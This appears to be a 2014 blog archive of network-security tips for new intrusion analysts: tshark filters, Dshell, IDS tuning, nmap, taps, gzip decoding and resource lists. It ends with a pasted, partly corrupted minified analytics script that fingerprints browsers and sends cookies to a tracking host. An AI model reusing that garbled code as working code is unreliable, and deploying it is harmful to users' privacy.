Monday, December 22, 2014

NetSec Tool:Dshell

I was introduced to a nice network forensics tool today called Dshell, written by the U.S. Army Research Lab. Written in Python, it allows dissection of pcaps using decoders, which can be chained together to do multiple analyses of traffic. You can run decode -l to see the list of available decoders, which includes:

dns  - extract and summarize DNS queries/responses (defaults: A,AAAA,CNAME,PTR records)
reservedips  - identify DNS resolutions that fall into reserved ip space
large-flows - display netflows that have at least 1MB transferred
long-flows  - display netflows that have a duration of at least 5 mins
rip-http   - rip files from HTTP traffic
protocols - Identifies non-standard protocols (not tcp, udp or icmp)

and many others..

You can download the source and find what dependencies need installed as well as examples and syntax at:

Thursday, December 4, 2014

About Those Obvious IDS Filters...

Tuning and filtering your IDS is a necessity to keep from being overwhelmed by false positives, and it's an ongoing process that never ends. New rules are applied, new network segments are stood up, and new services are offered.. it all requires a continual process of tuning. But sometimes that overly obvious filter might not be a good idea.

For example, IDS rules will trigger when they see Base64 encoded content (assuming you have that rule or rules enabled). The reason for that rule is that attackers will often use different encodings to try to obfuscate their attacks. But Base64 is used legitimately on a continual basis, so there may be, actually almost certainly will be, false positives.

You may be tempted to just disable the signature because it causes FP's. I wouldn't recommend that, because there will eventually be malicious content going across your network in Base64 format. Another idea would be to filter out certain sites or content. But think carefully about the full ramifications before you do this.

Here's one I see on a regular basis. Web sites created with the DudaOne Mobile Web Site Creator will contain a Base64 encoded site identifier that looks like this:

SiteType : eval(Base64.decode("J0RVREFPTkUn")),

You could create a content filter that looks for that particular string and use it to filter out packets that contain it. But giving it a little more thought, it would ALSO filter out compromised sites containing that string that also have malicious code else where on the page.

By applying that filter, you are in essence saying "I always trust any site that was created using the DudaOne Mobile Website Creator tool and I never want to see alerts from that site." Not really what you were intending to do, was it?

Use filtering judiciously and carefully and after careful thought about what it will actually do. You don't want to accidentally blind your IDS, and yourself, to traffic you need to see.

Tuesday, November 11, 2014

MAC Address Lookup

You're working in the command line and need to look up the vendor/manufacturer of a MAC address. Here's one way to do this. Make a request to the site using the --data parameter to see dump the content to stdout, like so:

curl --data --url

[{"startHex":"002290000000","endHex":"002290FFFFFF","startDec":"148444807168","endDec":"148461584383","company":"CISCO SYSTEMS, INC.","addressL1":"170 W. TASMAN DRIVE","addressL2":"M\/S SJA-2","addressL3":"SAN JOSE CA 95134-1706","country":"UNITED STATES","type":"MA-L"}]

What if you need to find the MAC addresses of a host in the first place? tshark will do that..

tshark -n -r packets1.pcap -T fields -e ip.src -e eth.src -Y 'ip.addr =='

To see the IP's and MAC addresses of the hosts your IP communicated with, just add those fields:

tshark -n -r packets1.pcap -T fields -e ip.src -e eth.src -e ip.dst -e eth.dst -Y 'ip.addr =='

Wednesday, November 5, 2014

Security Distros

There is a comprehensive list of security distros, both active and retired at:

Fyodor’s SecTools Top 125 is a much better page, in my opinion, for tools ( .

Wednesday, October 22, 2014

The Power of tshark, Part 3

All tshark/Wireshark dislay filters aren't limited to a precise match. tshark has the powerful ability to find multiple values that match one part of a field. A good example is the http.request.uri field. There is a modifier called "contains" that allows you to search the field for matches in diverse content. In the http.request.uri field, we could use "http.request.uri contains "google"", allowing us to match on,, safebrowsing, www, mail, news and so forth and domains that contain the word google even if it's part of a longer word, like

tshark -n -r packets1.pcap -Y "http.request.uri contains "google""

132   0.026293 -> HTTP 159 CONNECT HTTP/1.1
247   0.048647 -> HTTP 243 CONNECT HTTP/1.1 , NTLMSSP_NEGOTIATE
23956   8.625725 -> HTTP 298 CONNECT HTTP/1.1
28461  11.024309 -> HTTP 273 CONNECT HTTP/1.1
29078  11.308659 -> HTTP 396 CONNECT HTTP/1.0
38350  19.076371 -> HTTP 123 CONNECT HTTP/1.1
38368  19.096608 -> HTTP 207 CONNECT HTTP/1.1 , NTLMSSP_NEGOTIATE
51468  25.387301 -> HTTP 520 GET HTTP/1.1

The Power of tshark, Part 2

To expand on our example looking for ICMP type 3 packets, let's narrow that filter down to one specific type of Destination Unreachable message. If we look at the IANA ICMP parameters list, found at here, we see that there 15 codes that can be set with type 3. Some of the more common ones are code 4, Fragmentation Needed and Don't Fragment was Set, code 7, Destination Host Unknown and code 10, Communication with Destination Host is Administratively Prohibited. Let's add a code 4 to our tshark diplay filter.

tshark -r packets1.pcap -Y "icmp.type == 3 and icmp.code == 4"
501732 194.413516 -> ICMP 70 Destination unreachable (Fragmentation needed)
507176 196.247873 -> ICMP 70 Destination unreachable (Fragmentation needed)

Our output looks the same, with one difference. We're now seeing only ICMP messages that are type 3 and code 4, instead of all destination unreachables.

We've been using the default fields that tshark displays. But we can specify which fields to see, if we wish. In the case of ICMP there wasn't much reason to, as it is a concise output and shows us just what we need anyway. But when looking at other types of packets, we might want to limit the fields to specific data we need, or we may be looping through a large number of packets and pulling out just certain fields we wish to report on, like the IP addresses that generate a certain HTTP status code or just the IP's that generated traffic to a certain port or host.

tshark -n -r packets1.pcap -Y "tcp.port == 80"

16714   6.578480 -> HTTP 471 HTTP/1.1 200 OK  (text/html)
16715   6.579366 -> TCP 60 3786?80 [ACK] Seq=221 Ack=1846 Win=65071 Len=0
16716   6.579611 -> TCP 60 3786?80 [FIN, ACK] Seq=221 Ack=1846 Win=65071 Len=0
16717   6.580180 -> TCP 62 3787?80 [SYN] Seq=0 Win=65535 Len=0 MSS=1380 SACK_PERM=1
16720   6.582334 -> TCP 1434 [TCP segment of a reassembled PDU]
16721   6.582384 -> TCP 1434 [TCP segment of a reassembled PDU]
16722   6.582828 -> TCP 1434 [TCP segment of a reassembled PDU]
16724   6.583013 -> TCP 1434 [TCP segment of a reassembled PDU]
16725   6.583020 -> TCP 1434 [TCP segment of a reassembled PDU]
16729   6.583194 -> TCP 60 [TCP Window Update] 45932?80 [ACK] Seq=882 Ack=113388 Win=17817 Len=0

To filter this down to only see source IP and port and destination IP and port, we need to tell tshark we want to display only certain fields, using the "-T" parameter. We can specify fields, as well as output types of pdml, ps, psml or text.
After the -T fields param, we'll use the "-e" parameter to specify which fields to display. The Source IP field is "ip.src", the Source Port field is "tcp.srcport" and the destination IP and port are, as expected, "ip.dst" and "tcp.dstport".

So after adding these filters, our output is narrowed down to the four fields of interest for this run.

tshark -n -r packets1.pcap -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -Y "tcp.port == 80"   19248     80   19248     80   80   3743 80   45870    80   36719    80   36719    80   36719   5925 80   5925 80   45870 80

Next post we'll use more display filters to build our custom output and look at tsharks ability to do stats from the command line.

Wednesday, October 15, 2014

The Power of tshark

tshark (the command line version of Wireshark), is a powerful tool for doing network forensics and investigation. For the new intrusion analyst, the GUI may be more comfortable to work in, but as powerful as Wireshark is, it has it's limitations. The larger the pcap file, the longer it will take to load into Wireshark and it's possible to crash the program or even your operating system with too large of a file.

Another limitation is getting those pcaps transferred to you analysis machine, especially if the time frame you need to investigate spans multiple files (or hours or days or weeks).

tshark is uniquely suited to parsing through large amounts of packet data, across multiple files, with all the protocol analyzing power of Wireshark AND allowing you to use every one of Wiresharks 174,000+ display fields.

If you've never worked with tshark before, don't worry. You can start out with some very basic tcpdump-like syntax and then add more filtering and/or fields to display as you go along. 

Before you start, I'd suggest bookmarking the Display Filter Reference for Wireshark, found at here.
There's an even easier way to discover what filters you want to use by actually using a running instance of Wireshark, but I'll address that later. Let's keep it in the dark spaces for now.

A simple tshark command to show you all packets with an ICMP type of 3 (destination unreachable) would be like this:
tshark -r packets1.pcap -Y "icmp.type == 3"

Simple enough. The -r means read a file in instead of sniffing an interface (the same as tcpdump), packets1.pcap is our already captured packet data file, and -Y means use this display filter, which is "icmp.type == 3". 
And here's a sample of what tshark shows:

501732 194.413516 -> ICMP 70 Destination unreachable (Fragmentation needed)

tshark also shows us the ICMP code as well for no extra cost. As we can see the destination unreachable packet was because fragmentation was needed but the Don't Fragment flag was set (refer to IANA's ICMP Parameters doc and look up ICMP Code 4 for Type 3 here.

Had we wanted to see echo requests instead destination unreachables, we would change the "3" to an 8. Echo replies would be a "0" and so forth.

Now we are seeing all default fields coming back from tshark and using just one filter. But we can specify what fields we'd like to see instead. By using the -T parameter, we can specify what we want tshark to show us: the fields, specified with the -e parameter used in conjunction with -T, pdml output (Packet Details Markup Language), ps for Postscript, psml for Packet Summary Markup Language or text, which is the default if nothing is specified. In the next command we're going to tell tshark we'd like to see ONLY the following fields:

The source IP
The destination IP
The ICMP type
The ICMP code
and only for ICMP packets of type 3, destination unreachable.

tshark -r packets1.pcap -T fields -e ip.src -e ip.dst -e icmp.type -e icmp.code  -Y "icmp.type == 3"

And our output looks like this:,  ,           3       4,  ,           3       4,,         3       3,  ,           3       3,,     3       3

Now we could create a dataset with all the destination unreachables along with the code, telling us what type of unreachable messages they are from large pcaps of data. A 'for' loop would allow us to iterate through as many pcaps as needed.

Next post, we'll use more of the display filters available, add some labeling and get our data ready for importing into a spreadsheet or doing some graphing.

Thursday, October 2, 2014

nmap Run Time Interaction

Even if you've only been in network security a short time, you've probably come across nmap by now, the port scanner written by Fyodor (Gordon Lyon). It's been around a long time and is the de facto standard for reliable and feature rich port scanning.

You may have installed it and played with it or maybe you're now using it in your job duties. nmap is up to version 6.40 and has a whole slew of options including scripting that can do so much more than just return what ports are open on a box.

But once you've carefully consulted the man page and crafted that command to do just what you need and hit Enter, did you know you can still interact with your scan?

nmap has several run time interaction functions that can give you additional insight into your scan. For example, if you omitted verbosity flags (-v or -vv or even -vvv) to show you more of what the program is doing, you can increase the level while the scan is running by hitting the "v" key. Hitting it a second or third time increases the verbosity each time. Too much data? Hitting the capital "v" key will decrease verbosity each time you use it, all the way back down to the original run time level.

If you're having issues with a scan and not getting the right results, you can use the "d" key to turn up the debug level. Like verbosity, each subsequent use of the key increases the level and and using the upper case version moves it back down.

"p" will turn on packet tracing, showing you a tcpdump-like log of each packet. For this one, there's (obviously) only one level and capital "p" will turn it back off.  Your packet trace will look similar to this:

SENT (14.1570s) TCP > S ttl=42 id=54028 iplen=44  seq=2857954232 win=3072
SENT (14.1570s) TCP > S ttl=52 id=48876 iplen=44  seq=2858019769 win=1024
RCVD (14.1570s) TCP > RA ttl=128 id=14308 iplen=40  seq=0 win=0
SENT (14.1600s) TCP > S ttl=53 id=64554 iplen=44  seq=2857954232 win=2048
SENT (14.1600s) TCP > S ttl=41 id=33103 iplen=44  seq=2858019769 win=2048
SENT (14.1600s) TCP > S ttl=37 id=37013 iplen=44  seq=2858019769 win=2048
RCVD (14.1600s) TCP > RA ttl=128 id=14309 iplen=40  seq=0 win=0
SENT (14.1620s) TCP > S ttl=49 id=30436 iplen=44  seq=2858019769 win=2048

Monday, September 29, 2014

DerbyCon 4.0 Wrap Up

Another DerbyCon is over and like the previous ones, it was a great conference. Some of the videos of the talks are already posted on Adrian's (Crenshaw, IronGeek) Youtube channel which you can find here:

Once all the videos are posted you'll find a day by day, hour by hour table on Adrian's website under Hacking Illustrated Videos, found here:

Derbycon once again came through for Hackers For Charity in a big way, raising over 62 thousand dollars. If you don't know what that's all about, Hackers For Charity is the organization of Johnny Long, a security researcher most known for starting Google Dorks, which are search strings used to do recon of companies and devices through Google. Johnny gave up a lucrative career that included the news channel talk show circuit and numerous books to move, with his family, to Uganda to help the poorest of the poor. You can find out more at their web site at

Wednesday, August 27, 2014

Decompress gzip’d HTTP data from WireShark in Windows (No Linux required)

Here’s the alert with gzip’d data (look at the Content-Encoding header):

1.       Pull the packets into WireShark  from the IDS:

2.       Extract the zip file and open it in WireShark.

3.       Right click the first packet and choose the Follow Stream option:

4.       Choose the server side of the conversation from the drop down:

5.       Click Save As, give it a filename (like data.txt.gz). 
6.       Go to the directory where you saved the file, and open it with Notepad++ or a similar program.

7.       Delete the server header and the blank lines under it, leaving only the compressed content.

8.       After saving the file and closing it, right click the file and from the 7-Zip context menu, choose Extract Here. (If you get a “file is broken” error, continue anyway.)

9.       Open up the now decompressed file and begin analyzing.

Thursday, August 21, 2014

DerbyCon 4.0 - Family Rootz

I meant to post a reminder to get your DerbyCon tickets sooner rather than later a while back, and just didn't get around to it. If you didn't get yours by now, the con is sold out. Training is sold out as well.

Rooms at the Hyatt, gone. MIGHT be some left at the Marriott; if you have ticks and no room yet, better jump on it or you'll be sleeping in the RV of Doom. =-) There's also a Hampton Inn a couple blocks away. It's September in Louisville; it'll be a nice walk..

Dave and crew MAY release a small number of additional tickets right before the conference starts, so slap a monitor on the tickets page or check the Twitter feed if you got locked out.

If you have tickets, see you in Louisville..

Thursday, August 7, 2014

Free Cyber Security training

If you know of someone who might be interested in making network security a career, SANS is offering free online training, called CyberAces, starting September 1st. It's totally free, and you need not even register unless you'd like to take the quizzes to check on your progress. You can find out more and sign up, if you wish, at this link:

Thursday, July 31, 2014

Tap Types

If you're getting started in NetSec you've probably heard that taps are the preferred method for monitoring traffic over other methods like spanning ports. Taps have some decided advantages. They pass all packets that hit them, including malformed packets and over and under sized packets. A monitor port on a switch may drop these packets as undesirable, which from a network standpoint makes sense, but from a NSM (network security monitoring) standpoint, that isn't ideal. Maliciously crafted packets are often non-standard or malformed and the intrusion analyst needs to see those packets. Another dis-advantage to SPAN ports is that when the switch approaches becoming oversubscribed it will stop copying packets to the monitoring port. That may be the very time you're IDS is alerting of you an attack, or would be if it saw the packets. The tap has no such restrictions nor does it need to. It's not responsible for routing or inspecting packets; it's acting as a bump in the wire and passes everything it sees.
What about all those types of taps? What are the differences?
A passive tap sends a copy of the traffic passing through it to it's monitoring ports, but does not and cannot interact with it.
An active response tap has the ability to receive packets from the monitoring devices and put that traffic back on the wire. An example of this would be an IPS that terminates connections by sending spoofed reset packets to both ends of a connection, making each end think the other is shutting the conversation down. You can do this manually with tcpkill, which is found in the dsniff suite of network tools.
An aggregation tap takes both network ports and aggregates them onto one monitoring port, reassembling the duplex network stream so that you only need one port on your monitoring device. This also removes the requirement of using channel bonding on your device to see both directions of the network stream.
And finally, a regeneration tap has the ability to send copies of the traffic to multiple monitoring ports, to allow the same traffic to be monitored and analyzed by multiple devices. You might send the traffic to one or more IDS/IPS devices, a packet capture box and a network analyzer used by your infrastructure team.

Tuesday, May 27, 2014

New version of RemNux released

Lenny Zeltser has released the next major version, v5, of REMnux, an Ubuntu based virtual machine specializing in malware analysis. More information is available here.
If you're not familiar with REMnux, it's a distro with a wide assortment of tools for analyzing JavaScript, PDF files, executable binaries and the like and is a great resource for intrusion analysts investigating alerts from your IPS, packet capture devices, logging servers or network based malware tools.

Tuesday, May 13, 2014

Unzip Gzip

New intrusion analysts will find that web traffic is increasingly compressed due to more and more complex sites with lots of multimedia content. You might use wget to pull down a page in your investigation or use something like Spondulas and end up with a file of mostly "garbage", like this one (intentionally shortened).

HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Tue, 27 April 2014 18:44:27 GMT
Content-Type: text/html; charset=UTF-8
Set-Cookie: __cfduid=dda0ed9839b8fbbaadbee565b711a05951400006667162; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/;; HttpOnly
Cache-Control: max-age=10
Expires: Tue, 13 May 2014 18:44:37 GMT
CF-RAY: 12a101e5c86a09ac-ORD
Content-Encoding: gzip
Transfer-Encoding: chunked
Connection: keep-alive


Notice we see the Content-Encoding field tells us gzip compression is in use.

The Moloch packet capture program has a built-in gzip decompressor, but if you don't have a tool that will do this automatically, it's easily accomplished manually. Open the file in vi or some other text editor and remove the http header, blanks lines, etc down to the block of text (that starts with the first caret). Save the file with a .gz extension or rename it. Then just run gzip with the -d parameter (to decompress) on the filename. gzip -d
The resulting file should now be unzipped and readable (and no longer have the .gz extension).

Wednesday, May 7, 2014

Resource List

I recently put together a list of resources that a new NetSec/InfoSec associate could use to familiarize himself with some of the subject matter he'll come into contact with. It's by no means exhaustive, even of the bookmarks and articles and media that just I've saved over the years, but I think there's some useful content and thought I'd post it. I'm still in the process of fleshing it out (at which point it'd probably be overload for a new person) but I enjoy organizing study materials and absorbing as much as I can in my limited free time. Comments are welcome if you see something you think is a stinker and even more welcome would be you sharing some of your links to add to the list. Thanks in advance!
(Please remember the target here is someone new to NetSec/InfoSec. A 50 page white paper on optimizing ring buffers would be interesting to others but probably not what you want to lay on the new guy on the team.

Information Security Resources

Web sites:
Internet Storm Center -
Dark Reading Daily -
InfoSec Island -
Ethical Hacker Magazine -
PaulDotCom Tech Segments -

SecurityTube -
Derbycon(2013) -
Academy Pro -
SourceFire - Chalk Talks  -
DefCon -
BlackHat -
ShmooCon(2014) -
Microsoft (End User) -

Security Tems Glossary -
Network Security Glossary -
Mind Maps -

Talisker Security Wizadry -
Kapersky Threat Map -
Arbor Networks DDoS Map -
Mailing Lists:
Team Cyru Dragon Newsbytes(Private)  -
Full Disclosure -
SANS (all) -

Linux Library -
Learn Linux at -
Linux Documentation -

Open Security Training -
EDX Intro to Linux (starts Aug 1, $2,400.00 class for free) -

Getmon IT Security Podcasts -
ISC Podcasts (SANS Internet Storm Center) -

Vulnerability Information:
SecurityFocus -

TCPDump/Wireshark and General Packet Capturing
TCPDump command fu -
Wireshark Wiki -

Malicious Javascript:

Bruce Schneier -
Anton Chuvakin -
Marcus J. Ranum -
Lance Spitzner -
Snort -
VRT (Vulnerability Research Team of Sourcefire) -
Naked Security (Sophos) -
MalwareBytes -


I queried a group the other day for their favorite resource for new NetSec team members. I received a lot of good feedback, including one persons links to some really nice mind maps he'd made. The first two are unrelated to network security, but after that you'll find mind maps for subjects like crypto, PKI, securing home computers, reviewing wireless networks, PCI and more. The link is here. They are beautifully done and the author, Aman Hardikar, obviously put a lot of time and effort into them. I recommend you take a look at them.

Monday, May 5, 2014

2014 Verizon Data Breach Report

The 2014 edition of the Verizon Data Breach report is out. If you've never read this, it's a fascinating overview of the past year in respects to whom was compromised and how.
You can download your copy of the report at
No sign up is required though they do give an option of registering to get advance notification of future editions.

Tuesday, April 1, 2014

DerbyCon 2014

Derbycon 2014 tickets go on sale April 3rd. if you're going and don't have a reservation at the Hyatt, better get it in soon. Tickets will be sold here:

Monday, March 31, 2014

Malware Pcaps

I came across a page with pcaps of malicious traffic here. They're broken down into three categories: APT, CRIME and METASPLOIT. Good practice for incident response/intrusion analysis. Just email for the password to the zip files  Have fun!

Friday, February 28, 2014

JS Beautifier

There are various tools to help you clean up JavaScript and make it more readable when doing analysis. including the Linux program js-beautify, but there's also a great site called, appropriately enough, Paste in your code, choose your options, including whether or not you want to detect packers and obfuscators and hit Ctrl-enter or click the link. Here's some code I pulled from Wireshark..

eAt(d);128>c?b+=String.fromCharCode(c):(127c?b+=String.fromCharCode(c>>6|192):(b+=String.fromCharCode(c>>12|224),b+=String.fromCharCode(c>>6&63|128)),b+=String.fromCharCode(c&63|128))}return b}(a);f=function(a){var b,
c=a.length;b=c+8;for(var d=16*((b-b%64)/64+1),e=Array(d-1),f=0,g=0;g>>29;return e}(a);d=1732584193;c=4023233417;b=2562383102;e=271733878;for(a=0;a6],17,2821735955),c=k(c,b,e,d,f[a+7],22,4249261313),d=k(d,c,b,e,f[a+8],7,1770035416),e=k(e,d,c,b,f[a+9],12,2336552879),b=k(b,e,d,c,f[a+10],17,4294925233),c=k(c,b,e,d,f[a+11],22,2304563134),d=k(d,c,b,e,f[a+12],7,1804603682),e=k(e,d,c,b,f[a+13],12,4254626195),b=k(b,e,d,c,f[a+14],17,2792965006),c=k(c,b,e,d,f[a+15],22,1236535329),d=h(d,c,b,e,f[a+1],5,4129170786),e=h(e,d,c,b,f[a+6],9,3225465664),b=h(b,e,d,c,f[a+11],14,643717713),c=h(c,b,e,d,f[a+0],20,3921069994),d=h(d,c,b,e,f[a+5],5,3593408605),e=h(e,
t(e)).toLowerCase()}function Q(a,g,k){var h="";k&&(h=new Date,h.setTime(h.getTime()+864E5*k),h="; expires\x3d"+h.toGMTString());u.cookie=a+"\x3d"+g+h+"; path\x3d/"}function R(a){a+="\x3d";for(var g=u.cookie.split(";"),k=0;kg,function(){return,m.event)})}function D(){var a=(new Date).getTime();return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(g){var k=(a+16*F.random())%16|0;a=F.floor(a/16);return("x"==g?k:k&7|8).toString(16)})}function S(){return F.max(r.scrollHeight||0,w.scrollHeight||0,r.offsetHeight||0,w.offsetHeight||0,r.clientHeight||0,w.clientHeight||0)}function aa(){var a=u&&u.scrollTop||r&&r.scrollTop||0;a>N&&(N=a);a=100*(((u&&u.scrollTop||r&&r.scrollTop||0)+(m.innerHeight||w.clientHeight||
r.clientHeight||0))/S());a>O&&(O=F.floor(a))}function T(){I&&(P+=1*new Date-I,I=!1)}function ba(){H(m,"blur",function(){T()});H(m,"focus",function(){I=1*new Date})}function ca(){for(var a=2;10>a;a++)try{if(x("PDF.PdfCtrl."+a))return"Adobe Acrobat version"+a+".?"}catch(g){}try{if(x("PDF.PdfCtrl.1"))return"Adobe Acrobat version 4.?"}catch(k){}try{if(x("AcroPDF.PDF.1"))return"Adobe Acrobat version 7.?"}catch(h){}return""}function da(){try{var a=x("AgControl.AgControl");if(!a)return"";try{return J("AgControl.AgControl",
a.c("$version"))}catch(g){try{return J("AgControl.AgControl",a.g())}catch(k){try{for(var h,l=1;9>l;l++)a.k(l+".0")&&(h=l);return"AgControl.AgControl "+(h||"-1")}catch(n){return"AgControl.AgControl -1"}}}}catch(m){return""}}function J(a,g){return a+" "+g}function x(a){return new m.ActiveXObject(a)}function ea(){if(G.a)for(var a in G.a)fa(a,G.a[a])}function fa(a,g){m.setTimeout(function(){m[A]("send",a)},g)}function ga(a,g){if(!B)throw"Petametrics.send called before Petametrics.init";var k=new Image,
h="//\x3d"+encodeURIComponent((new Date).getTime())+"\x26jsk\x3d"+encodeURIComponent(B)+"\x26e\x3d"+encodeURIComponent(a)+"\x26uid\x3d"+encodeURIComponent(K)+"\x26sid\x3d"+encodeURIComponent(L)+"\x26pvid\x3d"+encodeURIComponent(U)+"\x26dc\x3d"+encodeURIComponent(u.cookie)+"\x26tzo\x3d"+encodeURIComponent((new Date).getTimezoneOffset())+"\x26ua\x3d"+encodeURIComponent(E.userAgent)+"\x26l\x3d"+encodeURIComponent(E.language)+"\x26os\x3d"+encodeURIComponent(E.platform)+
"\x26scd\x3d"+encodeURIComponent(M.colorDepth)+"\x26scrh\x3d"+encodeURIComponent(M.height)+"\x26scrw\x3d"+encodeURIComponent(M.width)+"\x26cu\x3d"+encodeURIComponent(m.location.href)+"\x26ref\x3d"+encodeURIComponent(u.referrer)+"\x26sppx\x3d"+encodeURIComponent(N)+"\x26sppc\x3d"+encodeURIComponent(O)+"\x26dh\x3d"+encodeURIComponent(S())+"\x26jsv\x3d"+encodeURIComponent(ha)+"\x26rs\x3d"+encodeURIComponent(F.random().toString(36).substr(2,16))+"\x26plh\x3d",l=encodeURIComponent,n=Z,t="";if(E.plugins){for(var f=
E.plugins,q=[],p=0;pe.c("$version"))}catch(A){b=""}b=s+b;var z;try{var v=x("SWCtl.SWCtl");z=!v?"":J("SWCtl.SWCtl",v.i(""))}catch(G){z=""}z=b+z;v=["rmocx.RealPlayer G2 Control","rmocx.RealPlayer G2 Control.1","RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)","RealVideo.RealVideo(tm) ActiveX Control (32-bit)","RealPlayer"];e=b=C;for(s=0;sh+l(n(t)),y;for(y in V)h+="\x26"+y+"\x3d"+encodeURIComponent(V[y]);for(var D in g)h+="\x26"+D+"\x3d"+encodeURIComponent(g[D]);k.src=h}function W(a){;switch(a[0]){case "init":ia.apply({},a.slice(1));break;case "send":ga.apply({},a.slice(1))}}function ia(a,g){if(B)throw"Petametrics.init called more than once.";B=a;H(m,"scroll",aa);H(m,"unload",function(){T();m[A]("send","exit",{viewingDuration:P/1E3})});$(g);K=R(X);K||(K=D(),Q(X,K,365));L=R(Y);L||(L=D(),Q(Y,L));U=D();
ea();ba();B in y&&"undefined"!=typeof y[B].b&&y[B].b()}var A=m.$petametricsVar,B=C,ha="0.2.3",X="__pmp",Y="__pmt",K=C,L=C,U=C,V={},G={a:{stuck_10s:1E4,stuck_3m:18E4}},r=u.body,w=u.documentElement,N=0,O=0,P=0,I=m[A].l,ja=function(){return{j:function(a){a=escape(a);var g="",k,h,l="",n,m,f="",q=0;do k=a.charCodeAt(q++),h=a.charCodeAt(q++),l=a.charCodeAt(q++),n=k>>2,k=(k&3)<<4 h="">>4,m=(h&15)<<2 l="">>6,f=l&63,isNaN(h)?m=f=64:isNaN(l)&&(f=64),g=g+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(n)+
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(k)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(m)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(f);while(qh="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)),n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)),m="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)),k=k<<2 h="">>4,h=(h&15)<<4 n="">>2,l=(n&3)<<6 a.length="" amp="" f9jdao1edm5dkqi="" f="" g="" h="" k="" l="" m="" n="" p="" return="" tring.fromcharcode="" unescape="" while="" y="{};(function(a,g){y[a]=g})(">{e:/\/q\/([A-Za-z0-9=]{0,})\?/,b:function(){var a=this.e.exec(m.location);1>=a.length||(a=ja.d(a[1]),m[A]("send","item_shown",{item_details:a}))}});(function(){var a=m[A].q||[];m[A]=function(){W(argument

and here's how the Online JavaScript Beautifier cleaned it up...

128 > c ? b += String.fromCharCode(c) : (127 < c && 2048 > c ? b += String.fromCharCode(c >> 6 | 192) : (b += String.fromCharCode(c >> 12 | 224), b += String.fromCharCode(c >> 6 & 63 | 128)), b += String.fromCharCode(c & 63 | 128))
return b
f = function (a) {
    var b,
        c = a.length;
    b = c + 8;
    for (var d = 16 * ((b - b % 64) / 64 + 1), e = Array(d - 1), f = 0, g = 0; g < c;) b = (g - g % 4) / 4, f = 8 * (g % 4), e[b] |= a.charCodeAt(g) << f, g++;
    b = (g - g % 4) / 4;
    e[b] |= 128 << 8 * (g % 4);
    e[d - 2] = c << 3;
    e[d - 1] = c >>> 29;
    return e
d = 1732584193;
c = 4023233417;
b = 2562383102;
e = 271733878;
for (a = 0; a < f.length; a += 16) q = d, p = c, m = b, s = e, d = k(d, c, b, e, f[a + 0], 7, 3614090360), e = k(e, d, c, b, f[a + 1], 12, 3905402710), b = k(b, e, d, c, f[a + 2], 17, 606105819), c = k(c, b, e, d, f[a + 3], 22, 3250441966), d = k(d, c, b, e, f[a + 4], 7, 4118548399), e = k(e, d, c, b, f[a + 5], 12, 1200080426), b = k(b, e, d, c, f[a +
    6], 17, 2821735955), c = k(c, b, e, d, f[a + 7], 22, 4249261313), d = k(d, c, b, e, f[a + 8], 7, 1770035416), e = k(e, d, c, b, f[a + 9], 12, 2336552879), b = k(b, e, d, c, f[a + 10], 17, 4294925233), c = k(c, b, e, d, f[a + 11], 22, 2304563134), d = k(d, c, b, e, f[a + 12], 7, 1804603682), e = k(e, d, c, b, f[a + 13], 12, 4254626195), b = k(b, e, d, c, f[a + 14], 17, 2792965006), c = k(c, b, e, d, f[a + 15], 22, 1236535329), d = h(d, c, b, e, f[a + 1], 5, 4129170786), e = h(e, d, c, b, f[a + 6], 9, 3225465664), b = h(b, e, d, c, f[a + 11], 14, 643717713), c = h(c, b, e, d, f[a + 0], 20, 3921069994), d = h(d, c, b, e, f[a + 5], 5, 3593408605), e = h(e,
    d, c, b, f[a + 10], 9, 38016083), b = h(b, e, d, c, f[a + 15], 14, 3634488961), c = h(c, b, e, d, f[a + 4], 20, 3889429448), d = h(d, c, b, e, f[a + 9], 5, 568446438), e = h(e, d, c, b, f[a + 14], 9, 3275163606), b = h(b, e, d, c, f[a + 3], 14, 4107603335), c = h(c, b, e, d, f[a + 8], 20, 1163531501), d = h(d, c, b, e, f[a + 13], 5, 2850285829), e = h(e, d, c, b, f[a + 2], 9, 4243563512), b = h(b, e, d, c, f[a + 7], 14, 1735328473), c = h(c, b, e, d, f[a + 12], 20, 2368359562), d = l(d, c, b, e, f[a + 5], 4, 4294588738), e = l(e, d, c, b, f[a + 8], 11, 2272392833), b = l(b, e, d, c, f[a + 11], 16, 1839030562), c = l(c, b, e, d, f[a + 14], 23, 4259657740),
d = l(d, c, b, e, f[a + 1], 4, 2763975236), e = l(e, d, c, b, f[a + 4], 11, 1272893353), b = l(b, e, d, c, f[a + 7], 16, 4139469664), c = l(c, b, e, d, f[a + 10], 23, 3200236656), d = l(d, c, b, e, f[a + 13], 4, 681279174), e = l(e, d, c, b, f[a + 0], 11, 3936430074), b = l(b, e, d, c, f[a + 3], 16, 3572445317), c = l(c, b, e, d, f[a + 6], 23, 76029189), d = l(d, c, b, e, f[a + 9], 4, 3654602809), e = l(e, d, c, b, f[a + 12], 11, 3873151461), b = l(b, e, d, c, f[a + 15], 16, 530742520), c = l(c, b, e, d, f[a + 2], 23, 3299628645), d = n(d, c, b, e, f[a + 0], 6, 4096336452), e = n(e, d, c, b, f[a + 7], 10, 1126891415), b = n(b, e, d, c, f[a + 14], 15, 2878612391),
